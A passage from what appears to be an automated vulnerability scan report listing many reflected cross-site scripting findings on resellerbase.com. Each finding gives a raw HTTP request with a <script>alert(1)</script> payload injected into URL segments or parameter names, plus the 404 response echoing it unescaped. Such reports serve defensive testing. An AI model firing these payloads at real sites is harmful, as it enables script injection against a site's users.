2.5003. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/rating/ [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/domain-names/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 49832<script>alert(1)</script>3a9c70d361f was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names/themes/kosmos/images49832<script>alert(1)</script>3a9c70d361f/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:47:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/themes/kosmos/images49832<script>alert(1)</script>3a9c70d361f/rating/ was not found on this server.</p>
...[SNIP]...

2.5004. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/rating/ [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/domain-names/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload dfdf2<script>alert(1)</script>e69feba8512 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names/themes/kosmos/images/ratingdfdf2<script>alert(1)</script>e69feba8512/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:48:02 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/themes/kosmos/images/ratingdfdf2<script>alert(1)</script>e69feba8512/ was not found on this server.</p>
...[SNIP]...

2.5005. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/rating/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/domain-names/themes/kosmos/images/rating/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload de014<script>alert(1)</script>11f71656671 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names/themes/kosmos/images/rating/?de014<script>alert(1)</script>11f71656671=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:46:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/themes/kosmos/images/rating/?de014<script>alert(1)</script>11f71656671=1 was not found on this server.</p>
...[SNIP]...

2.5006. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/rating/0.gif [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/domain-names/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 53082<script>alert(1)</script>69501a3e9ec was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service53082<script>alert(1)</script>69501a3e9ec/domain-names/themes/kosmos/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:48:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service53082<script>alert(1)</script>69501a3e9ec/domain-names/themes/kosmos/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.5007. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/rating/0.gif [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/domain-names/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 870f7<script>alert(1)</script>d1cbd170507 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names870f7<script>alert(1)</script>d1cbd170507/themes/kosmos/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:49:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names870f7<script>alert(1)</script>d1cbd170507/themes/kosmos/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.5008. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/rating/0.gif [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/domain-names/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 56c6e<script>alert(1)</script>791ca4fb57e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names/themes56c6e<script>alert(1)</script>791ca4fb57e/kosmos/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:49:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/themes56c6e<script>alert(1)</script>791ca4fb57e/kosmos/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.5009. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/rating/0.gif [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/domain-names/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b1587<script>alert(1)</script>d57eb3d3764 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names/themes/kosmosb1587<script>alert(1)</script>d57eb3d3764/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:49:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/themes/kosmosb1587<script>alert(1)</script>d57eb3d3764/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.5010. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/rating/0.gif [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/domain-names/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 7bcc5<script>alert(1)</script>8fcc457f301 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names/themes/kosmos/images7bcc5<script>alert(1)</script>8fcc457f301/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:49:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/themes/kosmos/images7bcc5<script>alert(1)</script>8fcc457f301/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.5011. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/rating/0.gif [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/domain-names/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 9cf47<script>alert(1)</script>faff976493b was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names/themes/kosmos/images/rating9cf47<script>alert(1)</script>faff976493b/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:49:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/themes/kosmos/images/rating9cf47<script>alert(1)</script>faff976493b/0.gif was not found on this server.</p>
...[SNIP]...

2.5012. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/rating/0.gif [REST URL parameter 7] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/domain-names/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload e40f3<script>alert(1)</script>34644a3f6a5 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names/themes/kosmos/images/rating/0.gife40f3<script>alert(1)</script>34644a3f6a5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:50:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/themes/kosmos/images/rating/0.gife40f3<script>alert(1)</script>34644a3f6a5 was not found on this server.</p>
...[SNIP]...

2.5013. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/rating/0.gif [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/domain-names/themes/kosmos/images/rating/0.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 5e0e3<script>alert(1)</script>f2b45752f55 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names/themes/kosmos/images/rating/0.gif?5e0e3<script>alert(1)</script>f2b45752f55=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:48:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/themes/kosmos/images/rating/0.gif?5e0e3<script>alert(1)</script>f2b45752f55=1 was not found on this server.</p>
...[SNIP]...

2.5014. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/rating/3half.gif [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/domain-names/themes/kosmos/images/rating/3half.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 38c2c<script>alert(1)</script>da865283983 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service38c2c<script>alert(1)</script>da865283983/domain-names/themes/kosmos/images/rating/3half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:48:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service38c2c<script>alert(1)</script>da865283983/domain-names/themes/kosmos/images/rating/3half.gif was not found on this server.</p>
...[SNIP]...

2.5015. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/rating/3half.gif [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/domain-names/themes/kosmos/images/rating/3half.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 6bcf0<script>alert(1)</script>7ebf85cb04d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names6bcf0<script>alert(1)</script>7ebf85cb04d/themes/kosmos/images/rating/3half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:49:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names6bcf0<script>alert(1)</script>7ebf85cb04d/themes/kosmos/images/rating/3half.gif was not found on this server.</p>
...[SNIP]...

2.5016. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/rating/3half.gif [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/domain-names/themes/kosmos/images/rating/3half.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload fafcb<script>alert(1)</script>63e2e5ca884 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names/themesfafcb<script>alert(1)</script>63e2e5ca884/kosmos/images/rating/3half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:49:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/themesfafcb<script>alert(1)</script>63e2e5ca884/kosmos/images/rating/3half.gif was not found on this server.</p>
...[SNIP]...

2.5017. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/rating/3half.gif [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/domain-names/themes/kosmos/images/rating/3half.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload d4355<script>alert(1)</script>82da6b08f7 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names/themes/kosmosd4355<script>alert(1)</script>82da6b08f7/images/rating/3half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:49:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/themes/kosmosd4355<script>alert(1)</script>82da6b08f7/images/rating/3half.gif was not found on this server.</p>
...[SNIP]...

2.5018. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/rating/3half.gif [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/domain-names/themes/kosmos/images/rating/3half.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 2136a<script>alert(1)</script>9f45d6d61b7 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names/themes/kosmos/images2136a<script>alert(1)</script>9f45d6d61b7/rating/3half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:49:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/themes/kosmos/images2136a<script>alert(1)</script>9f45d6d61b7/rating/3half.gif was not found on this server.</p>
...[SNIP]...

2.5019. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/rating/3half.gif [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/domain-names/themes/kosmos/images/rating/3half.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 7291c<script>alert(1)</script>47e69f842 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names/themes/kosmos/images/rating7291c<script>alert(1)</script>47e69f842/3half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:49:46 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/themes/kosmos/images/rating7291c<script>alert(1)</script>47e69f842/3half.gif was not found on this server.</p>
...[SNIP]...

2.5020. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/rating/3half.gif [REST URL parameter 7] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/domain-names/themes/kosmos/images/rating/3half.gif

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload db628<script>alert(1)</script>1ed8d632513 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names/themes/kosmos/images/rating/3half.gifdb628<script>alert(1)</script>1ed8d632513 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:49:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/themes/kosmos/images/rating/3half.gifdb628<script>alert(1)</script>1ed8d632513 was not found on this server.</p>
...[SNIP]...

2.5021. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/rating/3half.gif [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/domain-names/themes/kosmos/images/rating/3half.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 59440<script>alert(1)</script>75c30174560 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names/themes/kosmos/images/rating/3half.gif?59440<script>alert(1)</script>75c30174560=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:48:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
